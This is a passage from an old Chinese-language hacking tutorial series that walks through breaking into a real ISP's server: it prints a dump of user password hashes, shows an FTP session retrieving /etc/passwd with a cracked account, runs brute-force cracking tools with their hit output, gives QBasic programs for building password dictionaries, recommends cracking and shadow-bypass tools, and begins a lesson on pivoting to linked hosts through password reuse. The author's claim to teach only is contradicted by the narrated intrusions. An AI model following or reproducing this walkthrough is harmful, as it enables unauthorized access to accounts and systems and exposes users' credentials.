lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lillyhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash

(CoolFire 注: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee外, 其它我找到密碼的 EnCode Password 部份皆改過….. 除非你一個一個試啦~~~ 我沒說喔!)

www:/etc$ exit
logout
Connection closed by foreign host.

(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!)

ms.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
220-
220- 歡 迎 光 臨 ……. 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
220-
220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- [email protected].
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

(還是使用剛剛的帳號進入)

Name (www.coffee.com.tw:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

(直接到達檔案放置地點)

ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
issue
motd
mtools
profile
securetty
shells
termcap
skel
csh.cshrc
csh.login
lilo
inet
default
services
HOSTNAME
DIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
at.deny
fs
magic
rc.d
syslog.conf
printcap
inittab
sudoers
vga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
gateways
bootptab
exports
ftpusers
host.conf
hosts
hosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot
networks
nntpserver
protocols
resolv.conf
rpc
ftpaccess
hosts.lpd
ftpconversions
snooptab
msgs
ftpgroups
slip.login
slip.hosts
yp.conf.example
X11
lilo.conf
sendmail.cf
fstab
fastboot
mtab
syslog.pid
klogd.pid
shutdownpid
localtime
passwd.old
ioctl.save
psdevtab
ftp.banner
ftp.deny
issue.net
motd.bak
securetty.old
226 Transfer complete.

(取回該檔案)

ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(儘速離開)

ftp> bye
221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧
!!快點跑一下, 讓它自動產生字典檔案:

C:/hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin E-Mail: [email protected]
FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:/hack>

(這樣就好了 ! 自動產生的檔案會放在 dic.cfe 這個檔案中, 咱們跑一下 Brute Force看看!)

C:/hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine. v2.0
Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡

                                       
Attempts/Hits: 5184/9
                                       

Taking list input from dic.cfe
Beginning search of passwd for password: xxx

Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
Match for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
Match for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx

Done.

C:/hack>

看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實在是[email protected]#$%^…&*因某些關係所以其它部份要被 “馬賽克” 起來, 請各位讀者見量!

**** 再談密碼 ****

看了以上的破解示範, 就可以瞭解到許多人還是對於 “密碼” 這東西不是很有 “密碼”的觀念, 人就是那麼的懶, 隨便設定一個好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
QBasic 來設計一個自動產生密碼的小程式, 相信對許多人有很大的幫助,底下我們再來淺顯的介紹一下字母密碼的產生方法, 相信對於你在 Hack 某站會有更大的幫助.

事情的開始是有一位網友 mail 給我, 問我字典檔要如何寫程式來 “自動擴大”,而讓我有了寫這一段的想法, 現在我就針對這位網友的問題作一個更詳細的說明 (因已簡短回信答覆),並且寫出來讓大家瞭解一下, 當然我們的示範還是使用 QBasic, 因為這是最容易找到的程式了,而且語法大家也可能會比較熟悉一點, 如果我使用 VB 或 C 來寫, 可能有些人只會拿去用,而不會去修改或者寫個好一點的出來!

先說明一下原理好了: 我們所要作的程式是一個自動產生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個簡單的單字出來比較看看:

[1] apple [2] guest [3] james [4] superman [5] password

OK! 來看看! 如果你有一點英文的概念的話應該會知道母音及子音吧 !
我們首先這樣說明: 母音在英文
上有 : A E I O U 這五個, 所有的英文單字都會有這些母音(有些沒有的可能是專有名詞或縮寫), 也有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua… 等,
再來就是比較每個字的開頭, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是兩個子音再接一個母音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph,  st, sp, wh …. 等幾種(其它請自行統計), 然後是結尾部份, 通常結尾部分有下列幾種: e;est; ord; ard;  ls; es; s…等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來了 !!
我大略寫一個簡單的, 其它大家自行發揮, 如果有人學語言學的, 請幫忙弄一份常用組合表出來, 可能會更有幫助吧 !!

底下就是該程式片段, 執行後會產生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120個字的字典!!

————— MakeDic.BAS Start Here
——————————————————————————-
——–
DIM FirstWord$(20)
DIM MotherWord$(13)
DIM LastWord$(12)

DATA “br”, “bl”, “cl”, “dg”, “dr”, “fl”, “gr”, “kn”, “ph”, “st”, “sp”, “s”,
“t”, “p”, “k” , “f”, “m”, “n”, “b”,”k”
DATA “a”, “e”, “i”, “o”, “u”, “ai”, “ei”, “ea”, “io”, “ou”, “oi”, “au”, “eo”
DATA “st”, “ord”, “ard”, “e”, “es”, “le”, “ng”, “st”, “ing”, “n”, “b”, “s”

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I

FOR I = 1 TO 13
READ MotherWord$(I)
NEXT I

FOR I = 1 TO 12
READ LastWord$(I)
NEXT I

OPEN “MyDic.txt” FOR OUTPUT AS #1

FOR I = 1 TO 20
FOR J = 1 TO 13
FOR K = 1 TO 12
PRINT #1, FirstWord$(I) MotherWord$(J) LastWord$(K)
NEXT K
NEXT J
NEXT I

CLOSE : END
————— Cut Here, End of MakeDic.BAS
——————————————————————————-

當然這只是小部份的組合, 相信你可以作出一個更大的字典檔出來, 如:
子音 母音 子音 母音 子音, 作出來的字典檔會很嚇人喔 !! 這一個部份就講到這裡了 ! 如果你有很棒的字典產生程式,寫好了請 Mail 一份給我喔 !! 如果可以的話請說明是否可以公佈在我的 W3 上讓其它人下載 !!還是你只是要給我 ?!

希望每次講到密碼的問題後, 大家可以將這些密碼的產生方法與自己的密碼對照看看,如果有相同的請趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業者…… ISP
們…. 教教你們的使用者吧….. 唉~~~~

**** 後語 ****

我們的首頁感謝大家的支援, 現在人數已經到達 2,000 了, 這是一個地下站(未對外正式公佈) 很棒的一個數字, 在與其它工作室人員研究之後,  暫時不對外公佈站址, 如果你是 “誤闖”到本站來的! 我們歡迎你的加入, 但目前尚不考慮對外公佈站址, 請您在告訴你的朋友有這麼一個站存在的時候,請他不要隨便告訴別人 (請只告訴你信賴的朋友; 或對電腦有一份特別狂熱的人, 我們都歡迎他們的加入),我們目前所採用的方式將是開放式的! 對首頁部份暫時不以密碼方式處理.

** 不要 Crack 這個首頁的 ISP!!!! 否則 FETAG Sofeware’s Hacking Page將會完全關閉, 再也不尋找其它的地方來放置, 希望給你的是使用電腦的 “知識”, 不要利用它來奪取任何的 “權利”,本首頁著重的是教育, 而不是一 的教導攻擊的方法, 希望大家對於政府機關 (org.tw) 或教育機構 (edu.tw)不要作任何的破壞!!還有我的 ISP……

——
4
經過了上一次的實戰, 該 ISP 已經灰頭土臉, 當然也已經將被我揪出密碼的 UserPassword 改掉了, 但是系統安全部分還是沒有多大的改進, 唉…. 有點傷心.這一次的內容主要在加強上次所說明的字典檔部分, 因為我又想到另外一個方法可以快速的產生字典檔,而且用這個方法產生的字典檔更嚇人; 當然還要跟大家介紹另一個好用的 Password Crack 工具,並加上最近的一些信件整理出來的 FAQ 等, 希望能在過年以前就將這一篇寫好!

本次主題: 字典檔的維護及更新
連線位址: 無
特別說明: 快點加強一下你的字典檔吧 !! 不然怎麼破密碼哩?!

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 課程開始 ****

依我看, “字典” 這個討論應該是談不完的了, 因為有太多的方法了,但是為了維護你自身的權益, 自己的密碼最好保管好, 我在前幾天剛拿到  KOS 的時候, 拿她來跑一個 ISP 的 /etc/passwd 檔案, 原先單單使用 Crack Jack 只找到 22 組的密碼, 用了  KOS 加上 Crack Jack 居然共找到了88 組的密碼, 還好該 ISP 不像 高-NET 一樣是屬於 “時數收費” 的收費方式, 不然可能有許多的User 自己當了冤大頭都還渾然不知. 所以這個討論還是免不了的, 如果你覺得你不需要這些知識,請跳過去吧!!

上次的字典檔討論, 我寫了一個簡短的程式出來產生了 3120 組的密碼,但是這些密碼並不一定是一個 “字”, 也就是說產生完全合乎我們所限定的 “法則”, 但卻不一定是一個已存在的字,
所以如果要產生一個 “高效率” 的字典檔, 使用上次所說的那種方式就不是一個很好的方法了.
以上次所寫的程式 MAKEDIC.BAS 所產生的 MyDic.txt 為例, 其中的 braard clale cleoe dgeiingdgeie…….等字就不是很 “正常” 的字, 當然也有可能是某人的密碼, 但其機率小之又小.

這次所寫的程式名稱為 TXT2DIC.BAS, 我們還是先使用大家都熟悉的 QBASIC 來寫,以方便日後的修改, 先說明一下原理: 這個程式是一個自動產生字典檔的程式, 我們是經由給程式一個”文字檔”, 然後由程式自該文字檔中 “抽取出” 字出來, 這些文字檔必需是英文的文字檔,如果使用中文的文字檔的話程式跑起來會有問題, 英文文字檔的取得可由英文版軟體的 Readme檔或網路上的英文版學術論文或其它的來源.

當然有可能在檔案中會出現像 www.showtower.com.tw/~fetag 的字眼,我們總不能把它也列入字典檔中吧! 所以程式中有一點小小的設計, 就是該字若字母數大於 10 則不列入考慮,我們也可以使用上一次所介紹的子音 母音… 等的公式來作檢查法, 但是我沒有太多的時間作這些事,留待有空的人來寫吧!!

底下就是該程式原始碼, 請各位以 QBASIC 來啟動並執行它:

————— Txt2Dic.BAS Start Here
——————————————————————————-
——–
CLS
PRINT “Txt2Dic Version 0.1B (C)1997 By CoolFire ReChange: CoolFire”
PRINT “[Source Released, For Changer, Add Your Name in ReChange Field]”
PRINT
LINE INPUT “Text File Name: “; TxtFile$
LINE INPUT “Output Dic Name: “; DicFile$
OPEN TxtFile$ FOR INPUT AS #1
OPEN “TMPFILE1.$$$” FOR OUTPUT AS #2

REM Filter for text file

ReInput:
IF EOF(1) THEN GOTO EndFile
LINE INPUT #1, L$
ReTry:
L$ = LTRIM$(L$)
L$ = RTRIM$(L$)
TmpValue = INSTR(L$, ” “)
IF TmpValue <> 0 THEN
DicTxt$ = LEFT$(L$, TmpValue – 1)
PRINT #2, DicTxt$
LOCATE 7, 1: PRINT “Step 1, Add word : “; DicTxt$; STRING$(10, ” “)
L$ = RIGHT$(L$, LEN(L$) – TmpValue)
GOTO ReTry
ELSE
GOTO ReInput
END IF
END

EndFile:
CLOSE
REM Filter for special chapter and lower-case the word

OPEN “TMPFILE1.$$$” FOR INPUT AS #1
OPEN DicFile$ FOR OUTPUT AS #2
Special$ = “-,.:<>?*()/_” CHR$(34)
DO
LINE INPUT #1, L$
FOR I = 1 TO 13
SP$ = MID$(Special$, I, 1)
TmpValue = INSTR(L$, SP$)
IF TmpValue <> 0 THEN
LOCATE 8, 1: PRINT “Remode special word :”; L$; STRING$(10, ” “)
L$ = “”
END IF
NEXT I
IF L$ <> “” THEN
L$ = LCASE$(L$)
PRINT #2, L$
END IF
LOOP UNTIL EOF(1)
CLOSE
KILL “TMPFILE1.$$$”
END
————— Cut Here, End of Txt2Dic.BAS
——————————————————————————-

我只花了幾分鐘寫這個程式, ,所以有些考慮到的地方都沒有作修改, 在這裡再作些說明: 這個程式的第一個部份為分解字串, 將碰到的 CHR$(20)
也就是空白分離出來, 這是分解一句話中字與字最簡單的方法,並且會將分解出來的字存在一個暫存檔中, 作為第二部分的使用. 第二部分將暫存檔讀入,  並過濾非正常的字母出現,我只讓它過濾了十三種特殊字如: -,.:<>?*()/_” 等, 當然如果你可視需要再作刪減的功能.

原本想要再寫排序及過濾重覆字的功能, 但是這些功能不是那麼需要,因為在排序方面你可以使用電腦中 DOS 的 SORT 或 Crack Jack  的 JSort, 過濾重覆字也有 CoolFire 的 De-Sort可以使用, 所以就先在這裡停住, 有心的讀者可以自行修改, 修改完後也請傳送一份給我,作為日後教學的參考之用, 或提供網友們分享.

**** 新工具程式 Global KOS Krack (KOS) ****

記得從上次講過 Crack Jack 之後好像就沒有再講過 Password Crack 的工具程式了,當然也跟最近沒有甚麼好程式出現有關係,  像前一陣子風行的 Mail Bomb 最近也沒有再見到改版,倒是出現了一些寫得不怎麼樣的 Bomb 程式, 了無新意, 我現在還是在用  KaBoom 3.0, 你呢 ??
前幾天無聊逛了一下國外的 Crack 站臺, 意外的發現了一個叫作 KOS 的東西, 傳回來試了一試果然不錯,而且裡面還包含了一個 3MB 多的字典檔, 這對字典檔中缺料的讀者們肯定會有幫助的.
KOS 是許多工具的集合, 由一些批次檔對這些工具作了很棒的整合, 它必須與 Crack Jack一起使用才能運作, 平常我們在處裡 Password Crack 時都需要考慮到第一個字母大寫, 加數字,
字母大小寫轉換等等的工作, 都可以由 KOS 一手包辦, 你只要取得 KOS, 就可以配合著 Crack Jack將以前單單使用 Jack 尋找的 /etc/passwd 再翻出來 Crack 看看, 保證你會體會到擁有 KOS的好處.

像前面所說的, 我將以前只找到 22 組密碼的 /etc/passwd 重新跑過, KOS居然可以幫助我找出 88組的密碼, 足可見 KOS 可以增強 Crack Jack 四倍的 Cracking 能力, 作者宣稱 KOS 在
NT 上開了DOS 視窗就可以跑, 但是我以 NT 4.0 中文版及 Windows 95 (97 年版) 測試後還是因為Jack 無法在上面運作而停擺, 只好回到純 DOS 模式下才能夠使用, 但是 KOS還是能發揮它強大的功能, 唯一需要的就是一部速度快一點的機器, 當然還有時間也是必需的.

我使用 KOS Crack Jack 在 Pentium-100 32MB RAM SCSI-II HDD 上跑一個/etc/passwd  檔加上我的字典檔 (passwd 檔案大小為 197K, 字典檔大小為 5.1MB),跑了四天都還沒有完全跑完的情況, 就可以知道 KOS 盡了多大的努力在幫我們找出密碼, 當然如果你的 /etc/passwd 只有幾 K大小可能只消幾個小時就可以全部跑完了!! 不過要找出 root 密碼, 可能還是要靠點運氣才行了….

KOS 的壓縮檔中還包含了 SHADOW.C 及 UNSHADOW.C 兩個解 shadow 的程式, 可在 Unix主機上編譯以取得被 shadow 過的 /etc/passwd, 在這裡也順便提出,網友們不要忘了順便試試這兩支程式.

想要知道哪裡可以拿到 Global KOS Krack ?? 到我們的 Home Page 看看吧!!

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** CoolFire FAQ ****

[Q1]請問一下你的letmein 2.0何時出來?
[A1]因為最近實在是太忙了, 所以有很多的事情都沒有辦法依照預定的行程作完,所以最近也都不敢再多排訂行程,看看最近首頁更新的狀況也應該知道我們實在是沒有時間多作別的事了, 所以要先跟期待 LetMeIn 2.0 的人先說生抱歉, 但是我們的 Idea 還是在持續增加中,所以如果有空寫  LetMeIn 2.0 的時候將會推出很棒的版本, 請再等等吧~~~ 這陣子先過了再說!!

[Q2]請問一下letmein 1.0 的setup keys-要如何設定? 如果用 netterm 要找login name& passwd在letmein要怎樣設定不斷換行, 而不會文字一直加長?
[A2] LetMeIn 1.0 已經有作一份中文的簡易說明來補充原先說明檔的不足,所以如果你對該軟體有不清楚的地方請先閱讀這個說明檔之後再提出問題, NetMeIn 1.0 是在 NetTerm下作的測試,所以使用 NetTerm 配合 LetMeIn 應該不會有問題, 請再試試看!

[Q3]請問 “最新之系統安全 mailliast” 要到那裡去看? 還是要訂閱? 如何訂閱呢?是英文or 中文?
[A3]原本想要在這次首頁更新的時候加入一些 Mail List 訂閱的連結點,但是因為時間太匆促所以沒有作, 先跟各位說聲抱歉了, 你可在國外的 Hacker 站找到,或是先訂閱下面這一個List 來看看, 不過目前這類的 Mail List 都是英文的.

寫到: [email protected]
標題: (空白不填)
內容: SUBSCRIBE www-security 你的 E-Mail 信箱

[Q4]為什麼 De-sort 不能用? Key In ….. 為什麼會這樣??
C:/Program Files/LetMeIn>de-sort
De-Sort V0.1 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This program will:

[1] Delete reiteration word from a dictionary file
[2] Write the new file to a temp file
[3] Delete old dictionary file
[4] Rename new dictionary file as old one’s file name

Dictionary file name: 1
{Now Start To Check}

Some error found when program processing, Code= 53

De-Sort Author: James Lin E-Mail: [email protected]
FETAG Software Development Co: http://www.showtower.com.tw/~fetag
C:/Program Files/LetMeIn>
[A4]出現 Error Code = 53 代表開檔有問題, 你所輸入的檔名 ‘1’ 這個檔案可能不存在,你
應該檢檢視看這個檔案是否存在於目前目錄, 否則就應該給它目錄名稱, 其它的ErrorCode 可以參考 QuickBasic 或 Basic PDS 的書籍來查出錯誤發生的原因是甚麼!

[Q5]小弟自從放寒假後,”高-Net”費用 往上狂飆, 急起直追請問你有Crack 過 “高-Net”嗎??
“高 – Net”的防備似乎蠻強的!我是你的忠實讀者,你的作品coolhc-1,coolhc-2,cool-3,我都有努力鑽研學習,但就是弄不到 etc/passwd, 不知是不是我資質太低 ~~#@$%煩請高
手幫忙弄到 etc/passwd Ps: coolhc-2,and coolhc-3 最後的那句(高-Net 還是除外)是說”高-Net”可以或不可以 Crack ,如果不可以就不用幫我Crack 了![A5]當然還是有漏洞, 我有稍微試過, 只要是新發現的 Bug,他們會很快的有人將漏洞補上,而且該 ISP 有許多的工作人員, 並且採用計時收費的方式, 所以就算你 Crack 了,也是將帳目算到別人頭上, 有點缺德, 所以不需要 Crack 它, 大家不要申請它這個 ISP就好了! 不然還是請你看看系統安全的 Mail List 瞭解最新的系統安全訊息!比它們快一步進入系統就可以了! 這個文章還是以教學為目的, 無法給你 ISP 的 /etc/passwd!

[Q6]Hinet 密碼 to Dic: 因為 Hinet 的密碼格式是 1abcdefg 所以我就依照 coolhc-3的程式設計了這個東西!  (0aaaaaaa ~ 9zzzzzzz) 希望會有用! 歡迎批評,指教,修改.—————  HinetPas.BAS Start Here
——————————————————————————-
——–
DIM No$(10)
DIM Eng$(26)
DIM LastWord$(26)
DIM a$(26)
DIM b$(26)
DIM c$(26)
DIM d$(26)
DIM e$(26)

DATA “0”, “1”, “2”, “3”, “4”, “5”, “6”, “7”, “8”, “9”
DATA “a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”,
“p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”
DATA “a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”,
“p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”
DATA “a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”,
“p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”
DATA “a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”,
“p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”
DATA “a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”,
“p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”
DATA “a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”,
“p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”
DATA “a”, “b”, “c”, “d”, “e”, “f”, “g”, “h”, “i”, “j”, “k”, “l”, “m”, “n”, “o”,
“p”, “q”, “r”, “s”, “t”, “u”, “v”, “w”, “x”, “y”, “z”
FOR I = 1 TO 10
READ No$(I)
PRINT No$(I)
NEXT I

FOR I = 1 TO 26
READ Eng$(I)
NEXT I

FOR I = 1 TO 26
READ LastWord$(I)
NEXT I
FOR I = 1 TO 26
READ a$(I)
NEXT I
FOR I = 1 TO 26
READ b$(I)
NEXT I

FOR I = 1 TO 26
READ c$(I)
NEXT I

FOR I = 1 TO 26
READ d$(I)
NEXT I

FOR I = 1 TO 26
READ e$(I)
NEXT I

OPEN “Hinetpas.txt” FOR OUTPUT AS #1

FOR I = 1 TO 10
FOR J = 1 TO 26
FOR k = 1 TO 26
FOR l = 1 TO 26
FOR m = 1 TO 26
FOR n = 1 TO 26
FOR o = 1 TO 26
FOR p = 1 TO 26
PRINT #1, No$(I) Eng$(J) LastWord$(k) a$(l) b$(m)
c$(n) d$(o) e$(p)
NEXT p
NEXT o
NEXT n
NEXT m
NEXT l
NEXT k
NEXT J
NEXT I
CLOSE : END
————— Cut Here, End of HiNetPas.BAS
——————————————————————————-

[A6]謝謝這位網友, 你的 For… Next 的 Deep 實在太長了,不得不將格式改變一下才能放
進文章中. 也希望有更多人的集思, 寫出更多字的字典檔!

[Q7]我用pass2dic時沒辨法轉成文字檔ㄟ, 會有錯誤說(以下的訊息)請問要如何更正…
Some error found when program processing, Code= 75
[A7]試過了, 都沒有辦法產生這樣的 Code, 所以請看看磁碟是否防寫, 或參考 BasicPDS的
書籍尋找該 Error Code 的解釋或說明.

[Q8]請問一下,passwd除了會放在/etc/之下,還有可能會放在哪兒?
[A8]有有可能是 /etc/ 目錄中的 passwd.??? 或 shadow 或 shadow.??? 都有可能.

[Q9]我有在你的HOMEPAGE DOWNLOAD CoolHC#1.txt
裡面有些步驟不懂如:1.(首先要先連上某
一臺你已經有帳號的 Telnet 主機…..)? 是不是在剛上HINET時出現撥號視窗下選=3

進入TELNET?還是SELECT=1 進入PPP後用WS-FTP 找尋etc/pass 的檔案?
2.(我有在你的HOMEPAGE DOWNLOAD A letme.. of program 有點像claymore,不過不會使用
Q.他不把所有的設定都用好後按”START BF”在 DELAY 未結束時,把遊標移到要 CRACK 的
PASSWORD BOX?但是出現了很長的數字也沒有 CRACK? 3.(我在一些國外的WAREZ 看過有關HACK
UNIX的檔案裡有寫都包函一段 “C”語言,是不是能在 TELNET 下輸入執行程式就會自動CHECK
PASSWORD?是不是你在 “COOLHC#1.TXT裡有保留一段進入 SYSTEM 的程式?
4.(有時用WS-FTP下找PASSWORD時,不是隱藏就是沒用的檔案,是否有方法讓隱藏檔顯示?
5.你有一個AUTOHACK是不是一種利用撥電話的方式進入主機?(有點像電影中的戰爭遊戲)?
6.像SHADOW.C的檔案要如何組譯成執行檔?
[A9]好多的問題喔, 我一個一個回答吧! 1.LetMeIn! 是用在 PPP 模式, 不是 Telnet模式, 你
先連上 PPP 模式後開啟 NetTerm 然後開 LetMeIn! 在 LetMeIn! 中作好設定按下Start鍵後再回到 NetTerm  等待自動輸入. 2.Telnet 可在你的 Win95 中找到, 只要連上 PPP模式就可以使用, 你也可以使用 NetTerm 之類的軟體,  不一定要在連線時選 Telnet模式.3. LetMeIn! 需要在啟動後回到 Telnet 軟體才會自動 Crack 4.AutoHack是自動撥號尋找有連線資料機的電話號碼, 對 InterNet 來說可能沒有用出吧! 5.用這一期 CoolHC所說的 KOS 中有  Shadow.c 可以試試. 6.用 cc 指令可以編譯, 但要看你的 ISP有沒有提供.

[Q10]請問我抓到的一些字典檔 .Z 格式, 為何無法用 uncompress 解開,解開後都是一些亂碼
[A10]如果你用 Windows 或是 Win95 的話, 試著安裝 WinZip 應該就可以解開了 !!

[Q11]請問能夠提供更多的crack document嗎(能有中文嗎,英文的有點吃力說)或是介紹更多的
Crack Tools.
[A11] CoolHC 就是中文的呀! 但是其它的當然只有英文的可以看羅,現在有沒有多少人投入在
寫這樣的東西呀~~ 本期的新工具就有介紹 KOS,如果下此有好工具也會一併提出來介紹,若有網友使用的心得也可以傳給我放在 Home Page 上!

**** 後語 ****

CoolFire 改 E-Mail 了! 因為 HotMail 都要用 WWW 瀏覽器才能收信, 有點火大,所以這次在
CyberSpace 申請了一個新的帳號, 請寫信給我的時候不要投錯信箱了喔~~~~
E-Mail: [email protected]

我們的首頁感謝大家的支援, 現在人數已經超過 2,600 了, 這是一個地下站(未對外正式公佈)
很棒的一個數字, 在與其它工作室人員研究之後, 暫時不對外公佈站址, 如果你是 “誤闖”到本
站來的! 我們歡迎你的加入, 但目前尚不考慮對外公佈站址,請您在告訴你的朋友有這麼一個站
存在的時候, 請他不要隨便告訴別人 (請只告訴你信賴的朋友;或對電腦有一份特別狂熱的人,我們都歡迎他們的加入), 我們目前所採用的方式將是開放式的!對首頁部份暫時不以密碼方式處理.

** 不要 Crack 這個首頁的 ISP!!!! 否則 FETAG Sofeware’s Hacking Page將會完全關閉, 再
也不尋找其它的地方來放置, 希望給你的是使用電腦的 “知識”,不要利用它來奪取任何的”權利”, 本首頁著重的是教育, 而不是一 的教導攻擊的方法, 希望大家對於政府機關(org.tw) 或教育機構 (edu.tw) 不要作任何的破壞!! 還有我的 ISP……

——
首頁更新部分因為最近都太忙了, 所以每個人都沒有時間寫, 希望各位見諒, 這次特別把CoolHC的內容增加, 希望可以讓你學到更多, 如果有人有寫類似這樣的文章, 請寄給我一份,
我也會將它放到首頁上的~~~

——
5
本次主題: 善用你所得到的任何資訊 (Exm: HOSTS 檔)
連線位址: xxx.xxx.xxx.xxx (又馬賽克啦)
特別說明: 因為該站臺是一個 “很大” 的 網路提供者, 其服務地區遍及全亞,
所以必須要特別以馬
賽克來處理, 希望網友們不要介意 (咱們重的是內容嘛!! 又不是..
那個.. 那個). -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** 課程開始 ****

首先說明的是, 這個網路提供者的服務專案,包含了撥接及傳真還有幫其它業者架設網路等, 也就是說如果我們能夠善用他們的系統就可以免費傳真羅 ??  哇哩… 國際傳真耶,這間公司不就虧大了!!!!!所以馬賽克處理是必要的, 不過這次的課程不是說明這個 ISP 夠大,而是我們如何利用一組已經破解的密碼來入侵其它與其相連的主機, 這點是比較重要的!!

大家可能早就已經知道, 在 Unix 系統中 /etc 目錄下的 hosts 檔案的作用了,我們今天就來談談, 知道的人跳過去吧!! 如果使用  Windoz 95 的人, 也可以看看在你 95的系統目錄中也有一個這樣子的檔案, 他是長得像這個樣子的:  127.0.0.1 localhost FETAG , 表示 127.0.0.1 為LocalHost 也就是 FETAG 的電腦, 所以我們要找與該 Unix 有 “直接關係” 的主機可以由這個地方找到.

找到這些主機有甚麼用呀 ?? 繼然你已經有了一個主機的密碼,當然其它的主機也可能會有相同的User 在其它的主機上用同樣的帳號, 而且依據經驗來說,他們在其它主機上的密碼通常都